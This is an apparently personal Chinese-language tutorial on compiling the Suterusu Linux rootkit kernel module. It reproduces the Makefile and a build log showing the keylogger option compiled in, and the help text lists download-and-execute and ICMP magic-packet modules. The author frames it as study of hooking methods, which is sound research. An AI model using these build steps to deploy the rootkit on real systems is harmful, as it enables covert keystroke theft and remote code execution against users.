suterusu lkm 代码下载路径:
https://github.com/mncoppola/suterusu
虽然这个LKM开发的时间是好几年前的,但是也是值得好好研究其中的hook原理,我这里使用的系统是 Ubuntu 14.04.1 LTS ,内核版本4.2.0-42-generic。
编译 --> make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build
我们先来看看Makefile
obj-m += suterusu.o
suterusu-objs := main.o util.o module.o
ifdef KEYLOGGER
suterusu-objs += keylogger.o
MODULES += -D_CONFIG_KEYLOGGER_
ifdef UNLOCK
MODULES += -D_CONFIG_UNLOCK_
endif
ifdef LOGFILE
MODULES += -D_CONFIG_LOGFILE_
endif
endif
ifdef HOOKRW
suterusu-objs += hookrw.o
MODULES += -D_CONFIG_HOOKRW_
endif
ifdef DLEXEC
suterusu-objs += dlexec.o
MODULES += -D_CONFIG_DLEXEC_
ifdef ICMP
suterusu-objs += icmp.o
MODULES += -D_CONFIG_ICMP_
endif
endif
default:
@echo "To build Suterusu:"
@echo " make TARGET KDIR=/path/to/kernel"
@echo
@echo "To build with additional modules:"
@echo " make TARGET KDIR=/path/to/kernel MODULE1=y MODULE2=y..."
@echo
@echo "To cross-compile:"
@echo " make TARGET CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel"
@echo
@echo "To clean the build dir:"
@echo " make clean KDIR=/path/to/kernel"
@echo
@echo "Supported targets:"
@echo "linux-x86 Linux, x86"
@echo "linux-x86_64 Linux, x86_64"
@echo "android-arm Android Linux, ARM"
@echo
@echo "Supported modules:"
@echo "KEYLOGGER Monitor keystrokes"
@echo " UNLOCK Unlock the screen upon given key sequence"
@echo " LOGFILE Log keystrokes to a local file"
@echo "HOOKRW Hook sys_read and sys_write"
@echo "DLEXEC Download & execute a binary upon event"
@echo " ICMP Monitor inbound ICMP for magic packet"
linux-x86:
ifndef KDIR
@echo "Must provide KDIR!"
@exit 1
endif
$(MAKE) ARCH=x86 EXTRA_CFLAGS="-D_CONFIG_X86_ ${MODULES}" -C $(KDIR) M=$(PWD) modules
linux-x86_64:
ifndef KDIR
@echo "Must provide KDIR!"
@exit 1
endif
$(MAKE) ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ ${MODULES}" -C $(KDIR) M=$(PWD) modules
android-arm:
ifndef KDIR
@echo "Must provide KDIR!"
@exit 1
endif
$(MAKE) ARCH=arm EXTRA_CFLAGS="-D_CONFIG_ARM_ -fno-pic ${MODULES}" -C $(KDIR) M=$(PWD) modules
clean:
ifndef KDIR
@echo "Must provide KDIR!"
@exit 1
endif
$(MAKE) -C $(KDIR) M=$(PWD) clean
那如果我们要添加support modules我们应该怎么去编译呢?
从Makefile中可以看到,使用了#ifdef来自定义是否编译support modules。
比如我要在ko 中添加键盘记录功能,make 命令
make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1
那么需要编译其他的功能只需要依次添加就好
curtis@curtis-virtual-machine:~/Desktop/suterusu-master$ make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build KEYLOGGER=1
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_KEYLOGGER_" -C /lib/modules/4.2.0-42-generic/build M=/home/curtis/Desktop/suterusu-master modules
make[1]: Entering directory `/usr/src/linux-headers-4.2.0-42-generic'
CC [M] /home/curtis/Desktop/suterusu-master/main.o
CC [M] /home/curtis/Desktop/suterusu-master/util.o
CC [M] /home/curtis/Desktop/suterusu-master/module.o
CC [M] /home/curtis/Desktop/suterusu-master/keylogger.o
LD [M] /home/curtis/Desktop/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /home/curtis/Desktop/suterusu-master/suterusu.mod.o
LD [M] /home/curtis/Desktop/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/linux-headers-4.2.0-42-generic'
成功将键盘记录功能编译进ko文件